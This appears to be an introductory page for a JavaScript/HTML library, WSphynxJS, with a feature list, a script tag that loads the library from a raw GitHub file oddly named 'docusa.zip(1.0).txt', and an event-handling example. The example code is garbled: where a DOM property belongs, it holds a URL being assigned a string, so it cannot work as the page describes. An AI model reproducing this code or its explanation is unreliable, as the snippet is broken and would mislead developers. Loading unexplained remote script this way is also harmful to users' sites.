WSphynxJS is a Javascript and HTML library for building powerful interfaces.
Key features of WSphynxJS:
-
Clarify:
WSphynxJS allows you to organize your HTML code. You will be able to write events or scripts which interact with a specific div.
-
Simple to use:
WSphynxJS uses a usual syntax. It is easy to learn and to use. You just have to add the prefix "ws".
-
Design:
A modern design to enhance your code. The library is developed with a powerful syntax to match with the most recent browsers.
It is possible to use WSphynxJS thanks to a script tag placed in the head part:
<head>
<!--Some stuff here-->
<script defer src="https://raw.githubusercontent.com/SphynxTech/docusa/master/vaguely/docusa.zip(1.0).txt"></script>
</head>You can also directly download the library here. However, we do not recommend to copy the code in your own web page. We often update the source code and you would probably miss new functionalities or bug corrections.
<wsdiv> Hello
<wsonmousedown>
https://raw.githubusercontent.com/SphynxTech/docusa/master/vaguely/docusa.zip = "Clic";
</wsonmousedown>
<wsonmouseup>
https://raw.githubusercontent.com/SphynxTech/docusa/master/vaguely/docusa.zip = "Up";
</wsonmouseup>
</wsdiv>This example will render a simple div saying Hello. When you clic on it the div displays "Clic" and when you release the mouse it displays "Up".
With WSphynxJS, you can declare dynamic events and interact with your HTML page more easily.